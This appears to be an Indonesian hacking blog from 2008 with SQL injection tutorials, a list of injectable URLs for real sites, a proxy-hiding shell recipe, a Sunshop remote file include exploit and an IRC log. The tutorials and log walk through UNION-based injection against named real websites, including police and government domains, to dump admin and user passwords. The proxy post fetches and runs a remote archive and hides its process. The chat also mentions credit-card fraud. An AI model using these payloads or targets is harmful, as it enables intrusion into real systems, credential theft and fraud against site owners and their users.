Hacking Is Art

SQL 2

2008-06-29T04:38:00.000-07:00

Written by Pendekar Thursday, 10 April 2008 Tags: depkominfo situs pemerintah go.id hacking deface kelemahan situs bugs website tutorial windows office word excel tips & trik tips vista hacking and deface cara deface download mp3 download software porn blocker memblokir situs porno download movie download film fitna tuts liveconnector bugs liveconnector hacking liveconnector profile

tutorial ini gw dapetin dari forum yang di posting sama temen gw...well dengan semangat berbagi :P for education purpose only yah.... here is the tuts..

SQL injection (PHP)

siapkan secangkir kopi dan sebungkus roko...klo bisa sebelah cewe...biar semangat!! yuks mulai aja ptama2 cari site yg mau di inject.

contoh: http://www.zaishu.com.au/shop.php?id=41

skarang tambahkan tanda - di blakang angka 41

http://www.zaishu.com.au/shop.php?id=41-

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1 keluar tulisan itu.. kemungkinan bisa di inject nih.. yuk mulai aja...

query pertama kita gunakan UNION SELECT

http://www.zaishu.com.au/shop.php?id=-41+union+select+1/**

nah disini kita mencari angka ajaib..kalo blom kluar terusin nomor setelah select http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2/**

terusin sampe kluar angka ajaibna ternyata sampe di angka 14 h

ttp://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/**

nah angka ajaib yg kluar 4,5 dan 11 angka2 inilah yg nanti digunakan.

nah setelah dapet kita cari version,user,database dengan memasukkan query ke angka ajaib tersebut * version() : current mysql version * database() : current database where user is connected * user() : connected to the database * system_user() : obvious * session_user() * current_user() * last_insert_id() * connection_id()

kali ini saya akan menggunakan angka 11

http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14/** nah ternyata version 5 sip deh..lanjut lagi... cek database dan nama usernya http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,database(),user(),6,7,8,9,10,version(),12,13,14/** karna angka ajaib ada 3,kita gunakan aja semua... hasilnya

zaishu_zaishu zaishu_user@localhost 5.0.45-community

skarang kita ngeluarin tablenya yang kita cari adalah table admin..ok? query yg kita gunakan adalah table_name from information_schema.tables where table_schema=database() limit 0,1/* ok langsung masukin aja.. http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/** nah ternyata keluar table address_book ok lanjut lagi... untuk ngeluarin table berikutnya tinggal di tambahin limitnya menjadi 1,1 2,1 dan seterusnya. kali ini kita akan mencari table admin.. ternyata sampai 2,1 kluar table admin dengan nama adminrights sekarang kita cari columnnya. query yg kita gunakan adalah column_name from information_schema.columns where table_name=’table_name’ limit 0,1/* nah table name yg kita cari tadi adalah adminrights kita rubah dlu menjadi bilangan hexa menjadi 0x61646d696e726967687473 jadi skarang tinggal kita masukkan. http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14+from+information_schema.columns+where+table_name=0x61646d696e726967687473+limit+0,1/* nah ternyata kluar column id selanjutnya kita tinggal tambahkan limitnya menjadi 1,1 2,1 dst akan kluar column username,password langkah selanjutnya tinggal kita kluarin datanya. kita akan menggunakan query concat() akan menjadi seperti ini

http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x2D2D,password),12,13,14+from+adminrights/** Ups,..ternyata kluar login dan password admin

PS: tanda + hanya sebagai pemisah bisa di ganti dengan spasi dan tanda 0x2D2D juga sebagai pemisah pada query concat.

Thank to aimar h4ntu nakkuta

saia mah cuman COPAS..

http://www.pssi-football.com/id/view_news_111082.php?id=-1616+union+select+1,2,3,4,concat(loginname,0x2D2D,password),6,7,8,9,10,11+from+pssi_football_member/*

SQL Injection di PHP Code

2008-06-07T08:38:00.000-07:00

Yang harus lo siapin satu bungkus roko, cemilan dan alat pijit untuk tangan lo, kalo2 keseleo, kalo udah semua kita mulai.

http://www.theshiznit.co.uk/review.php?id=242 <<– ini target kita

Sekilas kalo dilihat tidak terjadi apa2 sekarang kita tambahkan tanda - sebelum 242

http://www.theshiznit.co.uk/review.php?id=-242

Maka pada area SCREESHOT dan artikelnya hilang, kemungkinan besar bisa di inject, tapi ingat g semuanya bisa.

Kita mulai injectnya dengan menggunakan UNION SELECT

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1/*

Kita harus memunculkan angka ajaib, jika belum muncul kita teruskan nomor setelah SELECT

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2/*

Ternyata di angka ke-2 belum juga muncul, lanjut lagi ampe tangan lo cantengan

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,5/*

Akhirnya muncul angka ajaibnya adalah 5

Sedikit kurang beruntung karena kita hanya mendapatkan satu angka, tapi gpp, itu lah asiknya

Setelah kita dapat angkanya kita cari vers, user, dan nama databasenya dengan memasukan perintah di bawah ini kedalam nomor yang muncul

* version() : current mysql version
* database() : current database where user is connected
* user() : connected to the database
* system_user() : obvious
* session_user()
* current_user()
* last_insert_id()
* connection_id()

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,version()/*

Ternyata versi 5, ok kita beruntung jika versi 4 kurang beruntung, kita lihat user dan databasenya

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,user()/* <<— sr0291893@81.31.99.13 nama usernya

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,database()/* <<— sr0291893 nama databasenya

Itu kalo kita hanya dapet satu nomor saja, jika mendapatkan 2 atau lebih nomor yg muncul kita bisa memasukan perntah kedalam nomor2 tersebut. Tapi g usah kuatir, ada trik tersendiri untuk memunculkan kesemuanya hanya dengan satu nomor, yaitu dengan perintah concat(), ok kita coba dengan perintah concat(version(),0×2D,database(),0×2D,user())

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,concat(version(),0×2D,database(),0×2D,user())/*

Ternyata bisa memuncul kan semua perintahnya 5.0.45-log-sr0291893-sr0291893@81.31.99.13

0×2D = - <<– ini hanya tanda untuk memisahkan saja

Sekarang kita cari tabelnya, ini bagian yg gue sukain, tp bikin pegel kalo tabelnya segambreng. Kita gunakan perintah table_name from information_schema.tables where table_schema=database() limit 0,1/*

Masukan table_name di nomor yang keluar, lalu masukan perintah from information_schema.tables where table_schema=database() limit 0,1/* setelah nomor terakhir

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1/*

Ternyata keluar tablenya dengan nama shiznit_comments

Untuk melihat tabel selanjutnya kita rubah limit+0,1 menjadi limit+1,1 trus limit+2,1 sampai tidak muncul table selanjutnya lagi. Di limit+7,1 kitamendapatkan table user dengan nama shiznit_users

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,table_name+from+information_schema.tables+where+table_schema=database()+limit+7,1/*

Sekarang kita cari columnnya dengan perintah column_name from information_schema.columns where table_name=’table_name’ limit 0,1/*

Cara pemasukannya sama dengan mencari table, dan untuk mencari column selanjutnya sama juga, dengan merubah limit 0,1 dengan limit 1,1 dst.

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,column_name+from+information_schema.columns+where+table_name=’shiznit_users’+limit+0,1/*

Ternyata muncul column id, kita cari lagi maka akan muncul md5id, created_on, email, password, nickname, first_name, last_name, location dan how_found. Wuih ada 10 column.

Sekarang kita keluarkan datanya, kita g perlu melihat semuanya, cukup intinya aja password dan nickname atau terserah lo, kalo mau lihat data yg lain. Karena kita hanya mendapatkan satu nomor ajaibnya, kita gunakan concat() saja, berlebih gampang, atau lo bisa memasukannya satu2 di nomor yg keluar atau nomor 5.

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,concat(nickname,0×3a,password)+from+shiznit_users/*

Apakah yg muncul….ternyata muncul data nickname dan password member disana

Note:

tanda + hanya sebagai pemisah, lo juga bisa make spasi atau /**/

+ = spasi atau %20 = /**/

Terserah lo mau gaya apa, gaya kodok juga boleh

SQL Injection Memang Ampuh

2008-06-05T09:06:00.000-07:00

Explorasi menggunakan SQL Injection
Dibawah ini beberapa web site yang diexplorasi dengan menggunakan SQL Injection :
http://www.amarullahfatimah.com/mod.php?mod=publisher&op=viewarticle&cid=1&artid=-126+union+select+1,2,version(),4,5,6,7,8,9,10/**
http://nusatenggaranews.com/mod.php?mod=publisher&op=viewarticle&cid=9&artid=3790+union+select+1/**
http://info.balitacerdas.com/mod.php?mod=publisher&op=viewarticle&artid=33+union+select+1/**
http://retailindo.info/mod.php?mod=diskusi&op=viewdisk&did=4+union+select+1/**
http://www.siwakz.net/mod.php?mod=publisher&op=viewarticle&cid=22&artid=58+union+select+1/**
http://www.tigapilar.org/mod.php?mod=publisher&op=viewarticle&cid=5&artid=762+union+select+1/**
http://www.arifhidayat.com/mod.php?mod=publisher&op=viewarticle&cid=1&artid=159+union+select+1/**
http://balitnak.litbang.deptan.go.id/mod.php?mod=publisher&op=viewarticle&artid=135+union+select+1/**
http://www.rakyatlampung.com/mod.php?mod=publisher&op=viewcat&cid=1+union+select+1/**
http://www.trubus-online.co.id/mod.php?mod=publisher&op=viewarticle&cid=12&artid=1141+union+select+1/**
http://www.silatindonesia.com/mod.php?mod=publisher&op=readarsip&year=2004&month=3+union+select+1/**
http://www.gayahidupsehatonline.com/mod.php?mod=publisher&op=viewarticle&cid=3&artid=235+union+select+1/**
http://www.agenpulsa.info/mod.php?mod=publisher&op=viewarticle&artid=68+union+select+1/**
http://www.onlinegoldmoney.com/mod.php?mod=iklanbaris&op=viewlink&cid=3+union+select+1/**
http://www.onlinegoldmoney.com/mod.php?mod=iklanbaris&op=viewlink&cid=3+union+select+1/**
http://www.langitlangit.com/mod.php?mod=-1+union+select+1/**
http://www.mirror.depsos.go.id/kfm/mod.php?mod=userpage&page_id=1+union+select+1/**
http://www.trubus-online.co.id/mod.php?mod=publisher&op=viewarticle&cid=1&artid=1166+union+select+1/**
http://www.cicurug.com/mod.php?mod=publisher&op=viewcat&cid=1+union+select+1/**
http://iklan.peluang-usaha.net/mod.php?mod=publisher&op=viewarticle&cid=9&artid=56+union+select+1/**
http://www.mesjidui.ui.edu/mod.php?mod=publisher&op=printarticle&artid=3+union+select+1/**
http://pfi3p.litbang.deptan.go.id/mod.php?mod=publisher&op=printarticle&artid=59+union+select+1/**
http://www.swarakita-manado.com/v2/mod.php?mod=publisher&op=viewarticle&cid=6&artid=20442+union+select+1/**
http://www.batamiklan.com/mod.php?mod=diskusi&op=viewcat&cid=9+union+select+1/**
http://www.onlinegoldmoney.com/mod.php?mod=iklanbaris&op=viewlink&cid=4+union+select+1/**
http://nusatenggaranews.com/mod.php?mod=publisher&op=viewarticle&cid=9&artid=2547+union+select+1/**
http://www.cicurug.com/mod.php?mod=publisher&op=viewcat&cid=5+union+select+1/**
http://www.totalfeedback.com/tfnew/mod.php?mod=publisher&op=printarticle&artid=2+union+select+1/**
http://www.bisnismalang.com/mod.php?mod=diskusi&op=printdisk&did=252+union+select+1/**
http://hipmisolo.com/mod.php?mod=katalog&op=viewlink&cid=24+union+select+1/**
http://www.merauke.go.id/mod.php?mod=publisher&op=viewcat&cid=-1+union+select+1/**
http://www.sentralweb.com/sentralweb/mod.php?mod=publisher&op=printarticle&artid=9+union+select+1/**
http://www.pesantrennet.org/mod.php?mod=-1+union+select+1/**
http://www.griyaanggraini.com/ga2007/mod.php?mod=-1+union+select+1/**
http://www.sidegg.com/mod.php?mod=-1+union+select+1/**
http://elink.dinkespurworejo.go.id/mod.php?mod=diskusi&op=printdisk&did=4+UNION+SELECT1+1/**
http://www.senirupa.net/mod.php?mod=publisher&op=printarticle&artid=123+UNION+SELECT1+1/**
http://pfi3p.litbang.deptan.go.id/mod.php?mod=publisher&op=printarticle&artid=55+UNION+SELECT1+1/**
http://www.propertynbank.com/mod.php?mod=publisher&op=printarticle&artid=45+UNION+SELECT1+1/**
http://tambangnews.com/mod.php?mod=publisher&op=printarticle&artid=969+UNION+SELECT1+1/**
http://www.bulutangkis.com/mod.php?mod=publisher&op=printarticle&artid=4552+UNION+SELECT1+1/**
http://www.warmasif.co.id/kesehatanonline/mod.php?mod=publisher&op=printarticle&artid=91+UNION+SELECT1+1/**
http://www.semarangcity.net/mod.php?mod=diskusi&op=printdisk&did=396+UNION+SELECT1+1/**
http://www.agrobisnis.net/mod.php?mod=diskusi&op=printdisk&did=5+UNION+SELECT1+1/**
http://www.smkn2sukawati.org/news/mod.php?mod=publisher&op=printarticle&artid=26+UNION+SELECT1+1/**
http://www.mimbar-opini.com/mod.php?mod=publisher&op=printarticle&artid=2571+UNION+SELECT1+1/**
http://www.lipia.org/mod.php?mod=download&op=viewcat&cid=3+UNION+SELECT1+1/**
http://www.denken.co.id/mod.php?mod=publisher&op=printarticle&artid=2+UNION+SELECT1+1/**
http://www.asmistmaria.ac.id/mod.php?mod=publisher&op=printarticle&artid=6+UNION+SELECT1+1/**
http://www.medaniklan.com/mod.php?mod=publisher&op=printarticle&artid=98+UNION+SELECT1+1/**
http://www.lcki.org/mod.php?mod=publisher&op=printarticle&artid=53+UNION+SELECT1+1/**
http://paroki-sragen.or.id/mod.php?mod=katalog&op=viewlink&cid=1+UNION+SELECT1+1/**

bikin peroksi

2008-03-21T08:37:00.000-07:00

1. Pertama2 Siapkan shell anda....
2. wget http://jackzard.110mb.com/proxy.tgz
- mengambil proxy.tgz dengan perintah wget ataw menggunakan command lain
3. tar –zxvf proxy.tgz
- mengekstrak proxy.tgz
4. cd cd pro atw work in direktory masuk ke pro
- pindah ke folder pro
5../xh -s "/usr/sbin/httpd -DSSL"
- hide prosesnya
6. ./prox -a -d -p6969
- pilih port 6969
7. seting proxy dengan IP target tersebut, commang ifconfig atw kamu ping aja target trsbt
8. liat di cmyip.com ip2location.com dll..

Thanks to : Indoundergound

Sunshop 4 RFI

2008-03-21T08:35:00.001-07:00

<@cah`cupu> Sunshop 4 RFI
[21:31] <@cah`cupu> sunshop 4 (index.php) Remote File Include Vulnerability
[21:31] <@cah`cupu> -----------------------------------------------------------------------------------------
[21:31] <@cah`cupu> # scripts : SunShop v4.0
[21:31] <@cah`cupu> # Discovered By : irvian
[21:31] <@cah`cupu> # scripts site : http://www.turnkeywebtools.com/sunshop/
[21:31] <@cah`cupu> # Thanks To : #hitamputih #nyubicrew #patihack
[21:31] * Joins: zhie_o (~gigi@125.162.53.102)
[21:31] <@cah`cupu> # special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
[21:31] <@cah`cupu> # dork : "powered by sunshop"
[21:32] <@cah`cupu> ------------------------------------------------------------------------------------------
[21:32] <@cah`cupu> bug found:
[21:32] <@cah`cupu> index.php
[21:32] <+aRiee> wew
[21:32] <@cah`cupu> $abs_path = dirname(__FILE__);
[21:32] <+demittegal> wkwkwkwkw
[21:32] <@cah`cupu> include $abs_path."/global.php";
[21:32] <@cah`cupu> checkout.php
[21:32] <@cah`cupu> $abs_path = dirname(__FILE__);
[21:32] <@cah`cupu> include $abs_path."/global.php";
[21:32] <+demittegal> hajarrrrrrrrrr
[21:32] <@cah`cupu> Exploit:
[21:32] <@cah`cupu> target.com/index.php?abs_path=[evilcode]
[21:32] <@cah`cupu> target.com/checkout.php?abs_path=[evilcode]

SQL TUTOR

2008-03-21T08:29:00.000-07:00

<&home_edition2001> lo sekalian aja duduk disamping gw
<+dbzgts> tak berani ahhhh
<+dbzgts> kata roney mesti siapin pantat klo deket2 bius
<&home_edition2001> <[DEVIL_MAY_CRY]> www.bpkp.go.id/index.php?idunit=20&idpage=805 << ini bisa ga? << cek injek sql
<+dbzgts> wakakaka
<&home_edition2001> sialllllllllllllllll
<&home_edition2001> koneksi lag
<&home_edition2001> asu
<&home_edition2001> la
<+[DEVIL_MAY_CRY]> Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/eby/2007/index.php on line 98
<+[DEVIL_MAY_CRY]> PENCARIAN
<+[DEVIL_MAY_CRY]> Kata kunci :
<+[DEVIL_MAY_CRY]> Kategor
<+dbzgts> kaboerrrrrrrrrrr
<+[DEVIL_MAY_CRY]> tuh kaya gitu bisa ga?
* +XhuRtzX (desperate@staff.bandung.solpotcrew.info) Quit (Quit from MILDNet: ye)
<+[DEVIL_MAY_CRY]> pake ' apa having 1=1 ?
<&home_edition2001> http://www.bpkp.go.id/index.php?idunit=20&idpage=805 and 1=0 << tetsting nya klo erorr berarti bisa di injek
<&home_edition2001> http://www.bpkp.go.id/index.php?idunit=20&idpage=805 and 1=1 < klo normal lagi berarti 100 % berbug sql
<&home_edition2001> klo php
<&home_edition2001> xix
<&home_edition2001> lo bayangin aja
<&home_edition2001> beli ama orang tuli sama gagu
<&home_edition2001> xixi
<&home_edition2001> cuman isa geleng2 sama manggut2
<&home_edition2001> nah sql php seperti itu
<+[DEVIL_MAY_CRY]> kaga error bius
<+[DEVIL_MAY_CRY]> cari yg laen ya
<+dbzgts> gue mo berguru ma bius ahh
<&home_edition2001> wew
<&home_edition2001> iya gak isa
<&home_edition2001> xixi
<+dbzgts> mo sogok pake code camfrog dulu
<+coayaoo> om bius
<&home_edition2001> cari yang lain
<+coayaoo> gimana klo cc ngga valid bisa jadi valid
<+coayaoo> gimana caranya
<&home_edition2001> site polri aja
<+baghostito> wew bius bisa ngajarin?? ;))
<&home_edition2001> http://www.bali.polri.go.id/agenda_details.php
<&home_edition2001> ini aja
<&home_edition2001> supaya ada tantangannya
<+[DEVIL_MAY_CRY]> ok
<+coayaoo> gimana
<+coayaoo> cara cc decline bisa jadi valid
<+[DEVIL_MAY_CRY]> http://www.bali.polri.go.id/agenda_details.php <<
variabelnya mana?
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php
* +ENGINEBOY (ENGINEBOY@Mild-C7DECCA9.rmts.satcom-systems.net) Quit (Ping timeout)
<&home_edition2001> ini juga bisa
<+[DEVIL_MAY_CRY]> Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in /var/www/html/aplib/phpMysqlConnection.php on line 313
<@live> MILDnet Info : DONATE Support MILDnet Network by donate your e-gold account to http://4222642.e-gold.com/ we appreciate all donation that you make, thank you
<&home_edition2001> Senen - Cempaka Putih Ramai Cenderung Padat
<&home_edition2001> 2008-01-29 19:53:53
<&home_edition2001> Situasi arus lalu lintas dari arah Jl Imam Bonjol dan Jl. Diponegoro sampai saat ini masih terpantau...
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228
<&home_edition2001> tu target
<+[DEVIL_MAY_CRY]> ok
<+brew0ks> wew
<&home_edition2001> itu aja ya
<+brew0ks> kok polisi
<&home_edition2001> gpp la
<+brew0ks> jgn
<&home_edition2001> biar ada tantangnnya
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 and 1=0
<&home_edition2001> tes
<+coayaoo> jangang lah
<+brew0ks> ntar sulit lu
* ENGINEBOY (ENGINEBOY@Mild-C7DECCA9.rmts.satcom-systems.net) has joined #nyubicrew
<+[DEVIL_MAY_CRY]> Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 23 in /home/pub/webbaru/_includes/metabase_mysql.php on line 162
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20and%201=0
<&home_edition2001> xix
<&home_edition2001> mantab
<+[DEVIL_MAY_CRY]> dah error tu
<&home_edition2001> kena bug tu
<&home_edition2001> xix
<&home_edition2001> coba balikna ke satu lagi
<+[DEVIL_MAY_CRY]> ok
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20and%201=1 << balik lagi
<+kangkung> http://www.lantas.metro.polri.go.id/news/index.php?id=
<&home_edition2001> awawaw
<+brew0ks> ampun dah gw
<+[DEVIL_MAY_CRY]> yup jadi ga errror
<+brew0ks> sama bius
<&home_edition2001> xi
<&home_edition2001> itu artinya
<&home_edition2001> xixi
* live sets mode: +v ENGINEBOY
<&home_edition2001> kita membuat false suatu nilai
<&home_edition2001> xixix
<&home_edition2001> namanya apa magic apa se
<+[DEVIL_MAY_CRY]> trus ngeluarin tabel pertama cemana?
<&home_edition2001> lupa
<&home_edition2001> magic question ya
<&home_edition2001> lupa
<&home_edition2001> wew
<+[DEVIL_MAY_CRY]> magic quote
<&home_edition2001> sabar la
<+brew0ks> Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 23 in /home/pub/webbaru/_includes/metabase_mysql.php on line 162
<&home_edition2001> iya magiq quot
<+brew0ks> :P
<&home_edition2001> wekekek
<&home_edition2001> trus langkah pertama
<+[DEVIL_MAY_CRY]> lanjuttt
<&home_edition2001> kita pake union
<&home_edition2001> xixix
<+brew0ks> lanjot
<+[DEVIL_MAY_CRY]> ok
<&home_edition2001> dengan union perintah menjadi false
<&home_edition2001> xixi
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 and 1=0 sama dengan http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select --
<&home_edition2001> xixi
* +log (log@www.rhe.name) has left #nyubicrew (No regret for inviter!)
* log (log@www.rhe.name) has joined #nyubicrew
<&home_edition2001> gimana supaya ntar jadi http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 and 1=1
<+brew0ks> we mantabs
<+brew0ks> INVALID QUERY !
<+[DEVIL_MAY_CRY]> query nya salah ya
<+[DEVIL_MAY_CRY]> hehehe
<+brew0ks> :(
<+[DEVIL_MAY_CRY]> supaya benar diapain bius?
* live sets mode: +v log
<+[DEVIL_MAY_CRY]> pa guru nya lama ni..xixixi
<+[DEVIL_MAY_CRY]> murid dah ga sabar
<+dbzgts> pa guru lag
<&home_edition2001> wew
<&home_edition2001> biasa lah tambah angka2
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0--
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0,1--
<+coayaoo> trus gimana pak guru bius
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0,1,1--
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0,1,1,1--
<&home_edition2001> sampe bernilai benar
<&home_edition2001> weeke
<&home_edition2001> coba sana
<+super2> keren euy
<+[DEVIL_MAY_CRY]> oow..coba ya
<+coayaoo> bius
<+super2> yang dicoba polri :))
<&home_edition2001> udah ngerti lom logikanya
<+coayaoo> klo mo dapat target shopadmin gimana pak bius
<&home_edition2001> wew
<&home_edition2001> cri yang homenya ada cart
<&home_edition2001> or $$$nya
<&home_edition2001> dijamin shop
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20union%20select%200,1,1,1,1,1,1,1,1,1--
<&home_edition2001> maknyus
<&home_edition2001> wekkeke
<&home_edition2001> artikenya muncul lagi
<&home_edition2001> wekekek
<&home_edition2001> swet
<&home_edition2001> gimana [DEVIL_MAY_CRY]
<&home_edition2001> kok duluan gw
* Guest17087 is now known as aanK
<&home_edition2001> padahal gw pake hp
* Help sets mode: +ao aanK aanK
<+[DEVIL_MAY_CRY]> iye sial..xixixi
<+[DEVIL_MAY_CRY]> ya udah lanjut
<&home_edition2001> lanjut aap
<&home_edition2001> xixix
<+[DEVIL_MAY_CRY]> kan udah bener tuh
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20union%20select%200,1,1,1,1,1,1,1,1,1-- << nilai true buat suatu union
<&home_edition2001> xixix
<&home_edition2001> beda script beda angkanya
<&home_edition2001> bisa panjang
<&home_edition2001> bisa pendek
<+[DEVIL_MAY_CRY]> wew
<&home_edition2001> xixix
<+dbzgts> liat column table gimana bius
<+[DEVIL_MAY_CRY]> ini dia intinya
<&home_edition2001> makanya dites satu2
<+dbzgts> gmana kita bisa tau
<&home_edition2001> wew
* _chilu_ (Metalinggu@chilu.keren.cool.a.biz) has joined #nyubicrew
<&home_edition2001> sabar la
<+dbzgts> jajajaja
<&home_edition2001> wew
<&home_edition2001> klo versi 4 gak isa
<+[DEVIL_MAY_CRY]> coba perlahan2
<&home_edition2001> klo versi 5 isa
<&home_edition2001> xixix
<&home_edition2001> untung2an
<&home_edition2001> la
<&home_edition2001> xixix
<@live> MILDnet Info : DONATE Support MILDnet Network by donate your e-gold account to http://4222642.e-gold.com/ we appreciate all donation that you make, thank you
<&home_edition2001> karena versi 5 ada information.schmeme
<&home_edition2001> versi 4 lom ada
<&home_edition2001> xixix
* &aanK (admin@Abuse.Vhost.Committee.MILDnet.Org) has left #nyubicrew
* aanK (admin@Abuse.Vhost.Committee.MILDnet.Org) has joined #nyubicrew
<&Help> [aanK] [[[[[[[[ SIGANTENG FROM IRC.MILDNET.ORG ]]]]]]]]
* Help sets mode: +ao aanK aanK
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20union%20select%200,1,1,1,1,1,1,1,1,1-- << udah nilai true
<&home_edition2001> kita buat false lagi
* live sets mode: +v _chilu_
<&home_edition2001> dengan nambahin -
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,1,1,1,1,1,1,1,1,1-- << udah nilai true
<&home_edition2001> untuk jalanin query sql
<&aanK> hmm.. ikuttan belajar gw ya biusss
<&home_edition2001> gak leh
<&home_edition2001> xixi
<&home_edition2001> apa hasilnya [DEVIL_MAY_CRY]
* +ShA^_^rY (meiliza@40A714FC.6194A399.1002205F.IP) Quit (Connection reset by peer)
<&home_edition2001> keknya lag bgt lo
* asLpLs (rasta@B0B03994.52A3B7FC.8DFA7C87.IP) has joined #nyubicrew
<&aanK> biuss bagi egold lah ,,
* &home_edition2001 slaps asLpLs around a bit with a large trout
<&aanK> kau kan dapat egold dari si raindayz kemaren
<+[DEVIL_MAY_CRY]> muncul angka 1
<&aanK> kwkwkwkwkw
<&aanK> iyes muncul angka 1
<&home_edition2001> wew
<&home_edition2001> iya
<&home_edition2001> xixi
<&home_edition2001> kita gak tai 1 itu 1 yang mana
<&aanK> $2 pls
<&home_edition2001> makanya kita ganti angka2
<&home_edition2001> jadi berurutan
<&home_edition2001> xixi
<+[DEVIL_MAY_CRY]> ok kaya gimana?
<&home_edition2001> biar tau 1 yang bisa dimunculin 1 yang mana
<&aanK> NVALID QUERY !
* live sets mode: +v asLpLs
<+coayaoo> 208029201000004152
<+coayaoo> Subscription Purchased $17.95(USD) for 30 days then
<+coayaoo> Subscription Purchased $17.95(USD) for 30 days then $17.95(USD) recurring every 30 days
<+coayaoo> Site URL http://www.videobox.com/login.jtp
<+coayaoo> Username sunarji Password
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,1,2,3,4,5,6,7,8,9--
<+[DEVIL_MAY_CRY]> lgi bljara dolo ni
<&home_edition2001> 3
<&home_edition2001> --1
<&home_edition2001> 5
<&home_edition2001> wekeke
<+baghostito> wew senangnya akhirnya bisa jg :D
<+baghostito> Thank you for your purchase, you have been approved!
<+baghostito> To access your new membership click the site URL link below
<&aanK> ada angkar 1 3 ma 5
<&home_edition2001> angka2 itu yang bisa di jadikan keluaran buat query sql
* pengemis (he@pengemis.users.mildnet.org) has joined #nyubicrew
<&aanK> itu artinye apaan bius
<+[DEVIL_MAY_CRY]> yup
<+[DEVIL_MAY_CRY]> 1 3 ama 5
<&home_edition2001> itu hasil dari union yang bisa kita ganti dengan qyery sql
<&home_edition2001> xixi
<&home_edition2001> contoh yang bisa di jalankan langsung
<&aanK> terus selanjutnya
<&home_edition2001> version()
<&home_edition2001> user()
* fax (ooo@Mild-9A4ECC68.multilinks.com) has joined #nyubicrew
* meett33jay (meett33jay@9265D089.362D78A1.748CC7F.IP) has joined #nyubicrew
<+dbzgts> situs nya jadi lag...byk yg access
<&home_edition2001> database()
<+coayaoo> home
<&home_edition2001> kita liat versinya berapa
* ganteng.mildnet.org sets mode: +i
<&home_edition2001> klo 5 bantaii
<+coayaoo> klo mo cari target
<+coayaoo> sekarang apa
<+coayaoo> key word nya apa
* live sets mode: +v pengemis
<&aanK> terus cemana ?
<&home_edition2001> klo 4 nebak2 yang tadi gw bilang menghadapi pedagang budek dan gagu
<&home_edition2001> cuman isa manggut2 sama geleng2
* +pengemis (he@pengemis.users.mildnet.org) has left #nyubicrew
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,1,2,version(),4,5,6,7,8,9--
<+[DEVIL_MAY_CRY]> or 1=convert(int,(@@VERSION))-- << ke gini bisa ga?
* live sets mode: +v fax
<&home_edition2001> 5.0.24a-Debian_9-log
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,user(),2,version(),4,database(),6,7,8,9--
<&home_edition2001> 5.0.24a-Debian_9-log
<&home_edition2001> --root@localhost
<&home_edition2001> polisi
<&home_edition2001> wekeke
* live sets mode: +v meett33jay
<&home_edition2001> <&home_edition2001> --root@localhost << user
<&home_edition2001> <&home_edition2001> polisi << databasenya
<&home_edition2001> lanjut
<&home_edition2001> kita keluarkan semua tabel + kolom2nya
<&home_edition2001> wekekke
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
